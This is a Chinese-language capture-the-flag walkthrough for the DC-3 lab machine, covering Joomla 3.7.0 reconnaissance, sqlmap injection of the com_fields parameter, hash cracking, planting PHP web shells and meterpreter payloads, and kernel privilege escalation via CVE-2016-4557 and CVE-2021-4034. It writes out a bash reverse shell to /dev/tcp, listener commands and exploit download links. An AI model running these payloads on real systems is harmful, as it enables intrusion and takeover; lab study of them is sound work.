【CTF】靶机：DC-3

靶机下载地址
链接：https://pan.baidu.com/s/1t0Tppz4tV6whenJMd2KnEw
提取码：6hac
--来自百度网盘超级会员V4的分享
视频教程
https://www.bilibili.com/video/BV11a411d78T

收集信息
扫描靶机ip与端口

我们看到靶机只开放了80端口
于是我们访问网站，并识别出网站程序为joomla

于是我们使用专门针对joomla的扫描工具joomscan
joomscan -u http://192.168.226.136

kali没有这款工具的，可以使用apt install joomscan命令进行安装
我们打开joomlascan后，对网站进行扫描

我们得到了后台地址
http://192.168.226.136/administrator/
与joomla的版本 3.7.0
于是，我们使用searchsploit进行扫描
searchploit joomla 3.7.0

我们找到sql注入漏洞，打开文本
searchploit -p 42033
我们看到使用方法，直接运行sqlmap即可

sqlmap

-u url

–risk (1-3)

–level (1-5)

–random-agent

–dbs

-p list[X]

-D db

–tables //show all tables in db

-T table

–columns //show all columns selected by table

--dump //查看字段名

sqlmap -u "http://192.168.226.136/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

sqlmap -u "http://192.168.226.136/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] --batch -D joomladb --tables

sqlmap -u "http://192.168.226.136/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb -T "#__users" -C username,password -dump

john解密哈希

我们创建一个文本
vi 1.txt
输入哈希密码
john --show 1.txt

解密成功snoopy

后门生成

法1：msfvenom

msfvenom -p php/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=1234 -f raw > shell.php

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.226.129 LPORT=4444 -f raw > shell.php

进入后台，编辑模板

创建文件，编写文件，放入我们准备好的木马源码

进入msf

输入

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

设置监听地址，即kali地址

set lhost 192.168.226.129

输入run运行

然后我们就拿到了shell

python -c 'import pty;pty.spawn("/bin/bash")'
获得交互shell

法2：weevely（无回显）

生成Shell

weevely generate <文件名>

weevely generate 123456 shell.php

weevely http://192.168.226.137/templates/beez3/7723.php 123456

python -m http.server 9999

法3：反弹shell

反弹shell，就是控制端监听在某TCP/UDP端口，被控端发起请求到该端口，并将其命令行的输入输出转到控制端。

通俗点说，反弹shell就是一种反向链接，与正向的ssh等不同，它是在对方电脑执行命令连接到我方的攻击模式，并且这种攻击模式必须搭配远程执行命令漏洞来使用。

由于防火墙等限制，对方机器只能发送请求，不能接收请求

对于病毒，木马，受害者什么时候能中招，对方的网络环境是什么样的，什么时候开关机，都是未知，建立一个服务端，让恶意程序主动连接，才是上策。

那我们开始吧！
首先，上传代码

<?php system("bash -c 'bash -i >& /dev/tcp/192.168.64.154/8888 0>&1'");?>

下来，进行监听

nc -l -vv -p 8888

然后进入shell

利用漏洞提权
法1：

CVE：[2016-4557]

Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalation - Linux local Exploit (exploit-db.com)

https://www.zacarx.com/a/aa/39772.zip

python -m SimpleHTTPServer 888

shell端解压，运行


拿到权限
去家目录，拿到flag

法2：
CVE-2021-4034漏洞exp

https://github.com/berdav/CVE-2021-4034

利用脚本：https://www.zacarx.com/a/aa/CVE-2021-4034-main.zip

我们下载脚本

解压，运行脚本
操作如图

拿到flag!!